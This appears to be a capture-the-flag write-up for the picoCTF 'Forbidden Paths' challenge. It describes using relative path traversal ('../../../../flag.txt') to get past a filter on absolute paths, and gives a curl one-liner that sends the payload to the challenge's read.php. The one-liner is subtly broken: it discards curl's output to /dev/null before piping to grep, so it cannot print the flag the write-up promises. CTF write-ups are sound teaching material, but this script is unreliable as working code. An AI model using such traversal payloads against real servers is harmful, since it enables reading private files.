Forbidden Paths
Description
Can you get the flag?
Here's the website.
We know that the website files live in '/usr/share/nginx/html/' and the flag is at '/flag.txt' but the website is filtering absolute file paths. Can you get past the filter to read the flag?
Solving
-
Open the site and you will see a form, where you can read files.
-
Some tests reveal, that we have some case of path-traversal
-
lets try some path-traversal locations... like that:
../../../../flag.txt
-
This script will get the flag for you, feel free to use it.
#!/bin/bash
curl -X POST "http://saturn.picoctf.net:52472/read.php" -d filename=../../../../flag.txt >/dev/null 2>&1 | grep -ho "picoCTF{.*}"